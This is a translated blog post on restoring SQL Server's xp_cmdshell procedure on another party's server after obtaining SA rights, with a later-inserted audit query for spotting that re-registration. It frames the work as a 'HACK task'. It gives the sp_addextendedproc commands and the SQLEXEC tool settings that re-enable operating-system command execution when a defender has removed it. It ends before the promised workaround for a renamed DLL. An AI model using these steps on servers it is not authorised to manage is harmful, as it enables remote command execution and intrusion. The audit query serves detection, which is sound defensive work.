SQL SERVER SA Permission Summary

xiaoxiao, 2021-03-06

Recently I needed to use these things and found that I was not quite clear on some of them, which really is nothing much. Still, I have to summarize it on my own blog. The process of using SQLEXEC to add an administrator is not covered here.

Prerequisites. Required tools: SQL Query Analyzer and SQLEXEC SUNX VERSION.

First part:

Analysis of removing xp_cmdshell:

First, know the statements:

1. The way to remove the xp_cmdshell extended procedure is to use the following statement:

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2. The way to add the xp_cmdshell extended procedure back is to use the following statement:

sp_addextendedproc 'xp_cmdshell', @dllname = 'xplog70.dll'
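As an added example that is not part of the original post: an audit query an administrator can run in Query Analyzer to see whether xp_cmdshell is currently registered and which DLL it is bound to, built on the same sysobjects/OBJECTPROPERTY test used in the drop statement above. It assumes SQL Server 2000-era catalogs (dbo.sysobjects, sp_helpextendedproc) and the stock DLL names mentioned on this page (xplog70.dll, xpsql70.dll).

```sql
-- Added audit script (not from the original post). Reports whether xp_cmdshell
-- is registered on this instance and which DLL backs it, so a re-registration
-- against a renamed or unexpected DLL stands out. Assumes SQL Server 2000-era
-- catalogs (dbo.sysobjects, sp_helpextendedproc); run against master.
USE master
GO
SET NOCOUNT ON

DECLARE @registered bit, @dll nvarchar(255)
SET @registered = 0

-- Same existence test the post uses before sp_dropextendedproc.
IF EXISTS (SELECT * FROM dbo.sysobjects
           WHERE id = OBJECT_ID(N'[dbo].[xp_cmdshell]')
             AND OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    SET @registered = 1

-- sp_helpextendedproc with no argument lists every registered extended
-- procedure as (name, dll); capture it so it can be queried.
CREATE TABLE #xp (name sysname, dll nvarchar(255))
INSERT INTO #xp EXEC sp_helpextendedproc

SELECT @dll = dll FROM #xp WHERE name = N'xp_cmdshell'

-- Summary row: registered or not, and whether the DLL is one of the stock names.
SELECT
    registered = @registered,
    dll        = @dll,
    status     = CASE
        WHEN @registered = 0 THEN N'xp_cmdshell not registered (expected after it was dropped)'
        WHEN @dll IS NULL    THEN N'xp_cmdshell object present but no DLL binding found - review'
        WHEN LOWER(@dll) NOT IN (N'xplog70.dll', N'xpsql70.dll')
                             THEN N'xp_cmdshell bound to an unexpected DLL - review'
        ELSE N'xp_cmdshell registered with the stock DLL'
    END

-- Full list of extended procedures and their DLLs, for baseline comparison.
SELECT name, dll FROM #xp ORDER BY name

DROP TABLE #xp
```

Comparing the second result set against a known-good baseline of the instance is what turns this from a one-off check into a detection.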

Now look at the symptom:

After obtaining SA permissions, if executing a remote command with SQLEXEC returns SQL_ERROR, then xp_cmdshell has most likely been removed.

Now let's look at two ways to restore xp_cmdshell after it has been removed:

Method 1: Use SQL Query Analyzer to connect to the other party directly; it is very convenient:

sp_addextendedproc 'xp_cmdshell', @dllname = 'xplog70.dll'

Method 2: Use SQLEXEC SUNX VERSION.

First fill in %s in the Format option of SQLEXEC SUNX Version, then enter in the CMD option:

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'

Or, in the case of SQL 2000:

sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

Removing xp_cmdshell with SQLEXEC SUNX Version works the same way:

Set the options as above, then enter

sp_dropextendedproc 'xp_cmdshell'

and that is all it takes.

Second part:

If the other party has deleted or renamed xplog70.dll, we continue our HACK task with the following method:

The symptom when xplog70.dll has been deleted or renamed is as follows.

Write in the Query Analyzer

sp_addextendedproc 'xp_cmdshell', @dllname = 'xplog70.dll'

and it prompts that an object named 'xp_cmdshell' already exists in the database.

So how do we restore it?

In fact, following the method provided by the master LCX, we can do it by writing a script in the Query Analyzer.

Please credit the original address when reposting: https://www.9cbs.com/read-126584.html
